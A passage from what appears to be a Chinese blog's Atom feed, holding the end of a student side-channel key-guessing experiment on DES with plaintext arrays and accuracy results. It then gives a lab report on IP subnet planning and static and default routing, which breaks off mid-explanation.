class="number">61</span>, <span class="number">5</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">32</span>, <span class="number">31</span>, <span class="number">39</span>, <span class="number">44</span>, <span class="number">56</span>, <span class="number">36</span>, <span class="number">4</span>, <span class="number">29</span>, <span class="number">41</span>, <span class="number">19</span>, <span class="number">60</span>, <span class="number">16</span>, <span class="number">28</span>, <span class="number">28</span>, <span class="number">38</span>, <span class="number">49</span>, <span class="number">46</span>, <span class="number">26</span>, <span class="number">42</span>, <span class="number">35</span>, <span class="number">5</span>, <span class="number">10</span>, <span class="number">22</span>, <span class="number">51</span>, <span class="number">63</span>, <span class="number">11</span>, <span class="number">11</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">40</span>, <span class="number">42</span>, <span class="number">17</span>, <span class="number">59</span>, <span class="number">14</span>, <span class="number">19</span>, <span class="number">0</span>, <span class="number">35</span>, <span class="number">39</span>, <span class="number">48</span>, <span class="number">58</span>, <span class="number">52</span>, <span class="number">37</span>, <span class="number">28</span>, <span class="number">58</span>, <span class="number">44</span>, <span class="number">58</span>, <span class="number">39</span>, <span class="number">36</span>, <span class="number">36</span>, <span class="number">27</span>, <span class="number">41</span>, <span class="number">41</span>, <span class="number">48</span>, <span class="number">26</span>, <span class="number">47</span>, <span class="number">21</span>, <span class="number">11</span>, <span class="number">24</span>, <span class="number">21</span>, <span class="number">42</span>, <span class="number">27</span>, <span class="number">33</span>, <span class="number">10</span>, <span class="number">18</span>, <span class="number">32</span>, <span class="number">52</span>, <span class="number">8</span>, <span class="number">23</span>, <span class="number">23</span>, <span class="number">32</span>, <span class="number">20</span>, <span class="number">63</span>, <span class="number">3</span>, <span class="number">49</span>, <span class="number">51</span>, <span class="number">59</span>, <span class="number">19</span>, <span class="number">19</span>, <span class="number">4</span>, <span class="number">13</span>, <span class="number">62</span>, <span class="number">29</span>, <span class="number">60</span>, <span class="number">32</span>, <span class="number">32</span>, <span class="number">62</span>, <span class="number">13</span>, <span class="number">37</span>, <span class="number">3</span>, <span class="number">35</span>, <span class="number">13</span>, <span class="number">60</span>, <span class="number">9</span>, <span class="number">14</span>, <span class="number">39</span>, <span class="number">8</span>, <span class="number">5</span>, <span class="number">40</span>, <span class="number">32</span>, <span class="number">61</span>, <span class="number">17</span>, <span class="number">39</span>, <span class="number">62</span>, <span class="number">3</span>, <span class="number">61</span>, <span class="number">51</span>, <span class="number">56</span>, <span class="number">15</span>, <span class="number">58</span>, <span class="number">30</span>, <span class="number">30</span>, <span class="number">63</span>, <span class="number">51</span>, <span class="number">35</span>, <span class="number">24</span>, <span class="number">6</span>, <span class="number">18</span>, <span class="number">35</span>, <span class="number">38</span>, <span class="number">32</span>, <span class="number">45</span>, <span class="number">30</span>, <span class="number">5</span>, <span class="number">38</span>, <span class="number">19</span>, <span class="number">31</span>, <span class="number">38</span>, <span class="number">60</span>, <span class="number">30</span>, <span class="number">2</span>, <span class="number">56</span>, <span class="number">40</span>, <span class="number">25</span>, <span class="number">46</span>, <span class="number">42</span>, <span class="number">19</span>, <span class="number">57</span>, <span class="number">41</span>, <span class="number">10</span>, <span class="number">2</span>, <span class="number">11</span>, <span class="number">29</span>, <span class="number">16</span>, <span class="number">60</span>, <span class="number">42</span>, <span class="number">16</span>, <span class="number">32</span>, <span class="number">60</span>, <span class="number">22</span>, <span class="number">38</span>, <span class="number">28</span>, <span class="number">38</span>, <span class="number">61</span>, <span class="number">61</span>, <span class="number">49</span>, <span class="number">55</span>, <span class="number">48</span>, <span class="number">3</span>, <span class="number">5</span>, <span class="number">4</span>, <span class="number">32</span>, <span class="number">32</span>, <span class="number">57</span>, <span class="number">14</span>, <span class="number">22</span>, <span class="number">16</span>, <span class="number">49</span>, <span class="number">13</span>, <span class="number">5</span>, <span class="number">37</span>, <span class="number">1</span>, <span class="number">5</span>, <span class="number">12</span>, <span class="number">16</span>, <span class="number">33</span>, <span class="number">33</span>, <span class="number">5</span>, <span class="number">12</span>, <span class="number">31</span>, <span class="number">18</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">26</span>, <span class="number">36</span>, <span class="number">39</span>, <span class="number">63</span>, <span class="number">38</span>, <span class="number">0</span>, <span class="number">34</span>, <span class="number">45</span>, <span class="number">9</span>, <span class="number">19</span>, <span class="number">27</span>, <span class="number">35</span>, <span class="number">45</span>, <span class="number">53</span>, <span class="number">11</span>, <span class="number">11</span>, <span class="number">42</span>, <span class="number">10</span>, <span class="number">25</span>, <span class="number">33</span>, <span class="number">55</span>, <span class="number">44</span>, <span class="number">7</span>, <span class="number">18</span>, <span class="number">41</span>, <span class="number">37</span>, <span class="number">10</span>, <span class="number">3</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">25</span>, <span class="number">5</span>, <span class="number">32</span>, <span class="number">12</span>, <span class="number">28</span>, <span class="number">25</span>, <span class="number">62</span>, <span class="number">44</span>, <span class="number">45</span>, <span class="number">63</span>, <span class="number">36</span>, <span class="number">58</span>, <span class="number">30</span>, <span class="number">30</span>, <span class="number">48</span>, <span class="number">47</span>, <span class="number">54</span>, <span class="number">11</span>, <span class="number">52</span>, <span class="number">60</span>, <span class="number">10</span>, <span class="number">15</span>, <span class="number">9</span>, <span class="number">23</span>, <span class="number">28</span>, <span class="number">27</span>, <span class="number">32</span>, <span class="number">23</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">59</span>, <span class="number">28</span>, <span class="number">63</span>, <span class="number">25</span>, <span class="number">20</span>, <span class="number">12</span>, <span class="number">46</span>, <span class="number">14</span>, <span class="number">54</span>, <span class="number">12</span>, <span class="number">23</span>, <span class="number">31</span>, <span class="number">62</span>, <span class="number">57</span>, <span class="number">34</span>, <span class="number">5</span>, <span class="number">50</span>, <span class="number">7</span>, <span class="number">33</span>, <span class="number">6</span>, <span class="number">16</span>, <span class="number">21</span>, <span class="number">37</span>, <span class="number">62</span>, <span class="number">20</span>, <span class="number">57</span>, <span class="number">3</span>, <span class="number">36</span>, <span class="number">5</span>, <span class="number">19</span>, <span class="number">2</span>, <span class="number">40</span>, <span class="number">45</span>, <span class="number">17</span>, <span class="number">8</span>, <span class="number">44</span>, <span class="number">51</span>, <span class="number">50</span>, <span class="number">31</span>, <span class="number">42</span>, <span class="number">54</span>, <span class="number">24</span>, <span class="number">32</span>, <span class="number">19</span>, <span class="number">55</span>, <span class="number">57</span>, <span class="number">11</span>, <span class="number">38</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">60</span>, <span class="number">52</span>, <span class="number">2</span>, <span class="number">7</span>, <span class="number">21</span>, <span class="number">35</span>, <span class="number">33</span>, <span class="number">55</span>, <span class="number">18</span>, <span class="number">0</span>, <span class="number">45</span>, <span class="number">54</span>, <span class="number">12</span>, <span class="number">10</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">61</span>, <span class="number">29</span>, <span class="number">43</span>, <span class="number">13</span>, <span class="number">48</span>, <span class="number">43</span>, <span class="number">28</span>, <span class="number">36</span>, <span class="number">59</span>, <span class="number">21</span>, <span class="number">22</span>, <span class="number">22</span>, <span class="number">17</span>, <span class="number">53</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">26</span>, <span class="number">13</span>, <span class="number">25</span>, <span class="number">44</span>, <span class="number">44</span>, <span class="number">61</span>, <span class="number">49</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">26</span>, <span class="number">10</span>, <span class="number">40</span>, <span class="number">47</span>, <span class="number">59</span>, <span class="number">38</span>, <span class="number">44</span>, <span class="number">31</span>, <span class="number">22</span>, <span class="number">49</span>, <span class="number">24</span>, <span class="number">34</span>, <span class="number">24</span>, <span class="number">7</span>, <span class="number">37</span>, <span class="number">35</span>, <span class="number">4</span>, <span class="number">42</span>, <span class="number">42</span>, <span class="number">16</span>, <span class="number">20</span>, <span class="number">3</span>, <span class="number">29</span>, <span class="number">1</span>, <span class="number">38</span>, <span class="number">53</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">10</span>, <span class="number">33</span>, <span class="number">26</span>, <span class="number">24</span>, <span class="number">62</span>, <span class="number">56</span>, <span class="number">25</span>, <span class="number">46</span>, <span class="number">10</span>, <span class="number">22</span>, <span class="number">11</span>, <span class="number">57</span>, <span class="number">25</span>, <span class="number">41</span>, <span class="number">30</span>, <span class="number">37</span>, <span class="number">23</span>, <span class="number">39</span>, <span class="number">29</span>, <span class="number">12</span>, <span class="number">59</span>, <span class="number">6</span>, <span class="number">29</span>, <span class="number">27</span>, <span class="number">25</span>, <span class="number">39</span>, <span class="number">29</span>, <span class="number">26</span>, <span class="number">25</span>, <span class="number">9</span>, <span class="number">11</span>, <span class="number">8</span>, <span class="number">29</span>, <span class="number">48</span>, <span class="number">42</span>, <span class="number">58</span>, <span class="number">8</span>, <span class="number">25</span>, <span class="number">29</span>, <span class="number">41</span>, <span class="number">35</span>, <span class="number">47</span>, <span class="number">9</span>, <span class="number">41</span>, <span class="number">57</span>, <span class="number">30</span>, <span class="number">24</span>, <span class="number">18</span>, <span class="number">28</span>, <span class="number">12</span>, <span class="number">15</span>, <span class="number">27</span>, <span class="number">61</span>, <span class="number">37</span>, <span class="number">8</span>, <span class="number">54</span>, <span class="number">7</span>, <span class="number">38</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">57</span>, <span class="number">9</span>, <span class="number">15</span>, <span class="number">54</span>, <span class="number">45</span>, <span class="number">50</span>, <span class="number">36</span>, <span class="number">31</span>, <span class="number">6</span>, <span class="number">3</span>, <span class="number">3</span>, <span class="number">32</span>, <span class="number">59</span>, <span class="number">15</span>, <span class="number">10</span>, <span class="number">21</span>, <span class="number">48</span>, <span class="number">22</span>, <span class="number">35</span>, <span class="number">24</span>, <span class="number">59</span>, <span class="number">38</span>, <span class="number">20</span>, <span class="number">52</span>, <span class="number">8</span>, <span class="number">45</span>, <span class="number">59</span>, <span class="number">39</span>, <span class="number">14</span>, <span class="number">37</span>, <span class="number">35</span>, <span class="number">8</span>, <span class="number">7</span>, <span class="number">9</span>, <span class="number">17</span>, <span class="number">15</span>, <span class="number">46</span>, <span class="number">7</span>, <span class="number">3</span>, <span class="number">59</span>, <span class="number">35</span>, <span class="number">31</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">12</span>, <span class="number">50</span>, <span class="number">44</span>, <span class="number">28</span>, <span class="number">2</span>, <span class="number">18</span>, <span class="number">58</span>, <span class="number">53</span>, <span class="number">55</span>, <span class="number">1</span>, <span class="number">41</span>, <span class="number">37</span>, <span class="number">58</span>, <span class="number">28</span>, <span class="number">48</span>, <span class="number">58</span>, <span class="number">62</span>, <span class="number">37</span>, <span class="number">30</span>, <span class="number">18</span>, <span class="number">36</span>, <span class="number">4</span>, <span class="number">55</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">32</span>, <span class="number">60</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">38</span>, <span class="number">56</span>, <span class="number">42</span>, <span class="number">48</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">15</span>, <span class="number">21</span>, <span class="number">4</span>, <span class="number">32</span>, <span class="number">60</span>, <span class="number">8</span>, <span class="number">10</span>, <span class="number">52</span>, <span class="number">51</span>, <span class="number">11</span>, <span class="number">4</span>, <span class="number">32</span>, <span class="number">26</span>, <span class="number">51</span>, <span class="number">13</span>, <span class="number">23</span>, <span class="number">38</span>, <span class="number">11</span>, <span class="number">23</span>, <span class="number">40</span>, <span class="number">61</span>, <span class="number">37</span>, <span class="number">19</span>, <span class="number">34</span>, <span class="number">41</span>, <span class="number">52</span>, <span class="number">37</span>, <span class="number">39</span>, <span class="number">39</span>, <span class="number">60</span>, <span class="number">24</span>, <span class="number">9</span>, <span class="number">17</span>, <span class="number">24</span>, <span class="number">20</span>, <span class="number">55</span>, <span class="number">21</span>, <span class="number">38</span>, <span class="number">52</span>, <span class="number">63</span>, <span class="number">47</span>, <span class="number">3</span>, <span class="number">7</span>, <span class="number">30</span>, <span class="number">16</span>, <span class="number">54</span>, <span class="number">19</span>, <span class="number">47</span>, <span class="number">24</span>, <span class="number">54</span>, <span class="number">63</span>, <span class="number">25</span>, <span class="number">38</span>, <span class="number">9</span>, <span class="number">21</span>, <span class="number">61</span>, <span class="number">55</span>, <span class="number">36</span>, <span class="number">40</span>, <span class="number">17</span>, <span class="number">37</span>, <span class="number">42</span>, <span class="number">37</span>, <span class="number">3</span>, <span class="number">58</span>, <span class="number">36</span>, <span class="number">17</span>, <span class="number">36</span>, <span class="number">29</span>, <span class="number">34</span>, <span class="number">52</span>, <span class="number">32</span>, <span class="number">54</span>, <span class="number">43</span>, <span class="number">53</span>, <span class="number">33</span>, <span class="number">49</span>, <span class="number">55</span>, <span class="number">8</span>, <span class="number">56</span>, <span class="number">38</span>, <span class="number">21</span>, <span class="number">43</span>, <span class="number">48</span>, <span class="number">24</span>, <span class="number">62</span>, <span class="number">54</span>, <span class="number">6</span>, <span class="number">48</span>, <span class="number">1</span>, <span class="number">19</span>, <span class="number">58</span>, <span class="number">46</span>, <span class="number">42</span>, <span class="number">11</span>, <span class="number">39</span>, <span class="number">2</span>, <span class="number">57</span>, <span class="number">29</span>, <span class="number">18</span>, <span class="number">7</span>, <span class="number">61</span>, <span class="number">44</span>, <span class="number">58</span>, <span class="number">35</span>, <span class="number">17</span>, <span class="number">21</span>, <span class="number">57</span>, <span class="number">49</span>, <span class="number">45</span>, <span class="number">29</span>, <span class="number">19</span>, <span class="number">11</span>, <span class="number">56</span>, <span class="number">8</span>, <span class="number">3</span>, <span class="number">60</span>, <span class="number">23</span>, <span class="number">50</span>, <span class="number">24</span>, <span class="number">25</span>, <span class="number">12</span>, <span class="number">47</span>, <span class="number">50</span>, <span class="number">18</span>, <span class="number">2</span>, <span class="number">27</span>, <span class="number">7</span>, <span class="number">29</span>, <span class="number">39</span>, <span class="number">53</span>, <span class="number">13</span>, <span class="number">21</span>, <span class="number">15</span>, <span class="number">9</span>, <span class="number">43</span>, <span class="number">3</span>, <span class="number">34</span>, <span class="number">23</span>, <span class="number">35</span>, <span class="number">35</span>, <span class="number">1</span>, <span class="number">2</span>, <span class="number">53</span>, <span class="number">12</span>, <span class="number">58</span>, <span class="number">46</span>, <span class="number">40</span>, <span class="number">12</span>, <span class="number">11</span>, <span class="number">51</span>, <span class="number">11</span>, <span class="number">29</span>, <span class="number">47</span>, <span class="number">6</span>, <span class="number">0</span>, <span class="number">63</span>, <span class="number">26</span>, <span class="number">34</span>, <span class="number">42</span>, <span class="number">32</span>, <span class="number">38</span>, <span class="number">1</span>, <span class="number">15</span>, <span class="number">15</span>, <span class="number">48</span>, <span class="number">19</span>, <span class="number">26</span>, <span class="number">48</span>, <span class="number">55</span>, <span class="number">27</span>, <span class="number">28</span>, <span class="number">39</span>, <span class="number">17</span>, <span class="number">19</span>, <span class="number">16</span>, <span class="number">34</span>, <span class="number">24</span>, <span class="number">19</span>, <span class="number">22</span>, <span class="number">28</span>, <span class="number">27</span>, <span class="number">54</span>, <span class="number">35</span>, <span class="number">7</span>, <span class="number">24</span>, <span class="number">34</span>, <span class="number">39</span>, <span class="number">1</span>, <span class="number">24</span>, <span class="number">14</span>, <span class="number">24</span>, <span class="number">24</span>, <span class="number">51</span>, <span class="number">41</span>, <span class="number">2</span>, <span class="number">50</span>, <span class="number">37</span>, <span class="number">50</span>, <span class="number">61</span>, <span class="number">33</span>, <span class="number">42</span>, <span class="number">34</span>, <span class="number">62</span>, <span class="number">54</span>, <span class="number">16</span>, <span class="number">6</span>, <span class="number">18</span>, <span class="number">21</span>, <span class="number">0</span>, <span class="number">52</span>, <span class="number">23</span>, <span class="number">52</span>, <span class="number">0</span>, <span class="number">46</span>, <span class="number">1</span>, <span class="number">51</span>, <span class="number">1</span>, <span class="number">42</span>, <span class="number">0</span>, <span class="number">48</span>, <span class="number">52</span>, <span class="number">14</span>, <span class="number">1</span>, <span class="number">47</span>, <span class="number">46</span>, <span class="number">58</span>, <span class="number">8</span>, <span class="number">15</span>, <span class="number">14</span>, <span class="number">27</span>, <span class="number">8</span>, <span class="number">60</span>, <span class="number">15</span>, <span class="number">21</span>, <span class="number">9</span>, <span class="number">36</span>, <span class="number">27</span>, <span class="number">38</span>, <span class="number">3</span>, <span class="number">24</span>, <span class="number">48</span>, <span class="number">40</span>, <span class="number">48</span>, <span class="number">15</span>, <span class="number">5</span>, <span class="number">41</span>, <span class="number">37</span>, <span class="number">43</span>, <span class="number">30</span>, <span class="number">38</span>, <span class="number">54</span>, <span class="number">49</span>, <span class="number">26</span>, <span class="number">41</span>, <span class="number">48</span>, <span class="number">10</span>, <span class="number">38</span>, <span class="number">47</span>, <span class="number">62</span>, <span class="number">54</span>, <span class="number">53</span>, <span class="number">30</span>, <span class="number">62</span>, <span class="number">49</span>, <span class="number">5</span>, <span class="number">18</span>, <span class="number">2</span>, <span class="number">37</span>, <span class="number">28</span>, <span class="number">9</span>, <span class="number">53</span>, <span class="number">24</span>, <span class="number">37</span>, <span class="number">56</span>, <span class="number">41</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">6</span>, <span class="number">46</span>, <span class="number">23</span>, <span class="number">42</span>, <span class="number">49</span>]</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/d87561249b2898b877981dd989109119.png#pic_center" alt="2-2.5"></p><center> <b> <small> 图8.2     长度1000的明文数组测试结果 </small> </b></center><p>为追求严谨,我把长度1000的明文数组也放上了,虽然很占地方,长度9和长度1000这两个数组也是我在此次实验中一直使用的明文数组。</p><p>由代码运行结果可知,长度1000的明文数组验证结果是100%的,长度1000的明文数组验证结果是48.44%。明文数组长度越小,其得到的汉明重量数组的中间值和数组内元素分布越不“规范”,猜测密钥结果并不稳定。</p><p>我接着测试了10组长度为9的随机明文数组,10组长度为1000的随机明文数组,得到的结果如下:</p><p>明文数组长度9:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">35.94</span>%, <span class="number">59.38</span>%, <span class="number">43.75</span>%, <span class="number">65.62</span>%, <span class="number">50.00</span>%, <span class="number">51.56</span>%, <span class="number">70.31</span>%, <span class="number">43.75</span>%, <span class="number">35.94</span>%, <span class="number">56.25</span>%]</span><br><span class="line">平均正确率:<span class="number">51.25</span>%</span><br></pre></td></tr></table></figure><p>明文数组长度1000:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%, <span class="number">100.00</span>%]</span><br><span class="line">平均正确率:<span class="number">100.00</span>%</span><br></pre></td></tr></table></figure><p><strong>小结:</strong></p><p>事实胜于雄辩。</p><hr><p>校内实验,未完整展示所有代码。若文中有描述错误的地方,欢迎斧正。</p>]]></content>
<summary type="html"><p>—————————————202&#x2F;12&#x2F;19 更新—————————————<br>在输入时除了密钥的遍历范围因为DES的S盒的“6进4出“机制导致范围限定在0-63以外,明文在作为S盒输入的时候也是被限制在每组长度为64。我将明文数组长度从1000更新</summary>
<category term="SCA" scheme="http://example.com/categories/SCA/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>IP网络规划与路由设计</title>
<link href="http://example.com/2021/09/28/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AE%9E%E9%AA%8C%20IP%E7%BD%91%E7%BB%9C%E8%A7%84%E5%88%92%E4%B8%8E%E8%B7%AF%E7%94%B1%E8%AE%BE%E8%AE%A1/"/>
<id>http://example.com/2021/09/28/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AE%9E%E9%AA%8C%20IP%E7%BD%91%E7%BB%9C%E8%A7%84%E5%88%92%E4%B8%8E%E8%B7%AF%E7%94%B1%E8%AE%BE%E8%AE%A1/</id>
<published>2021-09-28T14:30:18.000Z</published>
<updated>2022-03-18T06:03:46.024Z</updated>
<content type="html"><![CDATA[<p>(这是头歌平台上的一个计网实验,我懒得删改内容了,直接把实验报告上传上来了。大家可以跳到文章内自己想看的位置去看)</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ol><li><p>区别节点.网段、广播三种类型IP地址 </p></li><li><p>掌握IP子网掩码的两种表示方法 </p></li><li><p>明确IP网关含义 </p></li><li><p>掌握IP子网划分、网络规划的基本方法</p></li><li><p>熟悉组网仿真工具GNS3使用方法 </p></li><li><p>学会使用路由器的基本配置命令</p></li><li><p>深入理解路由表基本结构、路由过程</p></li><li><p>学会静态路由、默认路由配置基本操作</p></li><li><p>掌握路由分析、网络连通故障定位的方法</p></li></ol><h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><ol><li>头歌基于Linux的虚拟机桌面系统</li><li>组网仿真工具GNS3 </li><li>浏览器firefox</li><li>路由跟踪命令traceroute(在Windows平台是tracert)</li></ol><h2 id="相关原理或知识点"><a href="#相关原理或知识点" class="headerlink" title="相关原理或知识点"></a>相关原理或知识点</h2><ol><li><p>IP子网掩码的两种表示方法</p><p>32位IP子网掩码,特点是从高位开始连续都是1,后面是连续的0,它有以下两种表示方法: </p><p>(1)传统表示法,如:255.255.255.0 </p><p>(2)IP前缀(长度),如:24,表示IP地址的前24位是网络位。</p></li><li><p>节点、网段、广播三种类型IP地址</p><p>在IP网络中,每个通信节点、IP网段、广播地址都需要用“IP/子网掩码”来表示,并且它们的特征是截然不同的,千万不要弄错。</p></li><li><p>IP子网</p><p>每个IP子网(网段),都对应一个连续的IP地址块(空间),并且这个地址块的起始地址和长度一定是2的幂数。 例如:子网172.16.0.0/24,对应的地址块的起始地址(最小)是该子网的网络地址; 对应的地址块的结束地址(最大)是该子网的广播地址;其余的IP地址属于节点地址,一共有2的8次幂-2=256-2=254个。 </p></li><li><p>路由表的基本结构</p><p>构成路由表的表项称之为路由项。典型的路由表实例如下:</p><center><b><small> 表3.1    典型路由表</small></b></center></li></ol><table><thead><tr><th align="center">目标IP/目标掩码</th><th align="center">协议</th><th align="center">优先级</th><th align="center">开销</th><th align="center">下一跳</th><th align="center">本地出口</th></tr></thead><tbody><tr><td align="center">8.0.0.0/8</td><td align="center">RIP</td><td align="center">100</td><td align="center">3</td><td align="center">130.0.0.2</td><td align="center">Serial1/0</td></tr><tr><td align="center">9.0.0.0/8</td><td align="center">OSPF</td><td align="center">10</td><td align="center">50</td><td align="center">123.0.3.21</td><td align="center">Serial1/1</td></tr><tr><td align="center">9.1.0.0/16</td><td align="center">RIP</td><td align="center">100</td><td align="center">4</td><td align="center">203.9.0.2</td><td align="center">Ethernet0/0</td></tr><tr><td align="center">9.1.15.0/24</td><td align="center">Static</td><td align="center">60</td><td align="center">0</td><td align="center">172.0.31.2</td><td align="center">Ethernet0/1</td></tr><tr><td align="center">20.0.0.0/24</td><td align="center">Direct</td><td align="center">0</td><td align="center">0</td><td align="center"></td><td align="center">FastEthernet0/0</td></tr><tr><td align="center">3.3.3.2/32</td><td align="center">Static</td><td align="center">1</td><td align="center">0</td><td align="center">192.1.1.2</td><td align="center">LoopBack0</td></tr><tr><td align="center">0.0.0.0/0</td><td align="center">Static</td><td align="center">1</td><td align="center">0</td><td align="center">10.0.1.2</td><td align="center">GigabitEthernet0</td></tr></tbody></table><p>5、路由表的作用</p><p>网络中每台路由器都用到了2个或2个以上的网络接口进行网络互连,这里每个接口称之为路由接口。每个路由接口必须设有一个IP地址,如果该接口所在IP网段还有其它用户主机或服务器,该接口就是它们的IP网关。 路由表的主要作用是用于路由,路由是路由器若干功能中一个最基本的功能。当有一个报文从外部进入路由器后,路由器先判别它是过路报文,还是专门发给自己的报文,如果是过路报文,就要进行路由处理。</p><p>6、路由表的静态配置</p><p>添加一条静态路由操作命令:<code>ip route 目标IP 目标掩码 下一跳IP</code></p><p>删除一条静态路由操作命令:<code>no ip route 目标IP 目标掩码 下一跳IP</code></p><p>7、默认路由及其配置</p><p>路由表中,目标IP/目标掩码是0/0的路由项。称之为默认路由项。</p><p>如果路由表中含有一个默认路由项,理论上任何IP地址跟它都是匹配的。</p><p>目标0/0含义:当前路由器中登记的所有的非0/0目标都是已知的,相对于整个网络,其它未登记的都是未知目标,它们可以统一用0/0表示。</p><p>默认路由项最大优势:可以表达批量目标,提高了配置工作的效率,但是必须要确保它们有共同的下一跳,否则网络永远无法实现完全互通。</p><p>默认路由配置举例:<code>ip route 0.0.0.0 0.0.0.0 10.10.10.10</code></p><h2 id="实验任务"><a href="#实验任务" class="headerlink" title="实验任务"></a>实验任务</h2><ol><li>IP地址子网规划并分配好IP地址后填写对应表格</li><li>根据IP地址分配表配置PC端和路由各接口的IP地址</li><li>配置PC端和路由端之间、路由端和路由端之间的静态路由,查看配置文件并分析</li><li>为末梢路由器配置默认路由,进行网络连通测试和路由跟踪测试</li></ol><h2 id="IP网络规划"><a href="#IP网络规划" class="headerlink" title="IP网络规划"></a>IP网络规划</h2><p>IP子网地址规划采用的子网划分的方式。</p><center> <b> <small> 表5.1     IP子网地址规划 </small> </b></center><table><thead><tr><th align="center">网段序号</th><th align="center">IP地址</th><th align="center">子网掩码</th><th align="center">所需IP数</th><th align="center">网段类型</th><th align="center">网关IP</th><th>图中成员节点</th></tr></thead><tbody><tr><td align="center">1</td><td align="center">192.168.1.0</td><td align="center">24</td><td align="center">230</td><td align="center">用户</td><td align="center">192.168.1.254</td><td>PC1、R1接口F0/0</td></tr><tr><td align="center">2</td><td align="center">192.168.2.252</td><td align="center">30</td><td align="center">2</td><td align="center">互连</td><td align="center">无</td><td>R1接口F0/1、R2接口F0/0</td></tr><tr><td align="center">3</td><td align="center">192.168.3.252</td><td align="center">30</td><td align="center">2</td><td align="center">互连</td><td align="center">无</td><td>R2接口F0/1、R3接口F0/0</td></tr><tr><td align="center">4</td><td align="center">192.168.4.128</td><td align="center">25</td><td align="center">100</td><td align="center">用户</td><td align="center">192.168.4.129</td><td>R3接口F0/1、PC2</td></tr><tr><td align="center">5</td><td align="center">192.168.5.252</td><td align="center">30</td><td align="center">2</td><td align="center">互连</td><td align="center">无</td><td>R2接口F1/0、R4接口F0/0</td></tr><tr><td align="center">6</td><td align="center">192.168.6.192</td><td align="center">26</td><td align="center">60</td><td align="center">用户</td><td align="center">192.168.6.193</td><td>R4接口F0/1、PC3</td></tr></tbody></table><p>首先要划分不同的网段,第一步就是要设置不同的网络标识。既然要设置不同的网络标识,首先就要了解网络标识怎么计算和判定。</p><p>网络标识作为网段的划分依据,不同网段的网络标识一定是不一样的,而网络标识是通过IP和子网掩码皆化为二进制后,每一位进行与运算,得到的结果就是网络标识。</p><p>拿192.168.1.20/24举例:</p><p>IP:11000000.10101000.00000001.00010100</p><p>子网掩码:11111111.11111111.11111111.00000000</p><p>得出AND结果:11000000.10101000.00000001.00000000 == 192.168.1.0</p><p>而A、B、C三类IP的网络标识算法是有差异的,如下所述</p><blockquote><p>A类:只算第一段</p><p>B类:只算第一、二段</p><p>C类:算第一、二、三段</p></blockquote><p>因为此次实验采用的是C类IP,所以192.168.1.0是192.168.1.20/24的网络标识,也表明IP-192.168.1.20在192.168.1.0网段内。</p><p><strong><font color='red'>但是!上面的的网段判定方法只适用于未进行子网划分的情况,进行子网划分后的网络标识计算结果和网段判定就不一样了!</font></strong></p><p><strong>子网划分</strong></p><p>谈到了子网划分就先说子网划分,怎么不一样会在子网划分的分析中解答。</p><p>子网划分是为了划分不同的网段,而不同的网段意味着不同的网络标识,前面举的例子表达的很清楚了,网络标识是通过IP和子网掩码的与运算所得的。而<code>与1进行与运算得到的永远是本身,与0进行与运算得到的不一定是本身</code>,这就表明子网掩码有着决定网络标识结果的能力。</p><p>为什么这么说呢,大家注意,IP是由网络地址和主机地址组成的。网段划分划分的是IP的网络地址,网络地址的不同表达出不同的网段,后面的剩余位表达的就是主机地址。所以网段和主机地址是1对N的关系。</p><p>比如192.168.1.0网段,前三段是网络地址,后一段是主机地址。在192.168.1.0这个网段内能表达的主机IP范围就是192.168.1.1~192.168.1.254(主机位全0和全1扣除),这就是1对N。</p><blockquote><p>主机位全0表示本网络,全1留作广播地址,所以在保留两位主机位的条件下,排除全0和全1。</p></blockquote><p>在一个网段内网段是不变的,变的只是主机位,这和“<code>与1进行与运算得到的永远是本身,与0进行与运算得到的不一定是本身</code>”这句话是不是很契合?子网掩码是1的部分和IP进行与运算得到的结果是不变的,所以可以通过子网掩码1的位数来决定网络地址的位数,进而决定了网段。</p><p>现在知道了<code>子网掩码有着决定网段的能力</code>。那么上文红字部分所提到的“<font color='red'>进行子网划分后的网络标识计算结果和网段判定就不一样了</font>”的问题就有答案了——子网掩码的1的位数能决定与运算得到的网络标识结果有多少位是不变的,即决定网络地址位数,即决定网段。</p><p>那么根据子网数目的需求或者是主机数的需求而进行子网划分后,就不能只是单纯的用与运算结果的前几段进行网段的判定,而是根据子网掩码为1的位数来决定与运算结果的前多少位是用来判定网段。</p><blockquote><p>其实一直都是根据子网掩码1的位数,根据前几段判断只是不同类型IP的默认值。</p></blockquote><p>那就那么接下来继续分析子网划分。</p><p>子网划分可以根据子网数划分和主机数划分。本实验中题目只要求了所需IP数,即通过主机数划分。</p><p>拿第四个网段举进行实例分析,第四个网段所需IP数是100,因为 2^6 < 100 <2^7 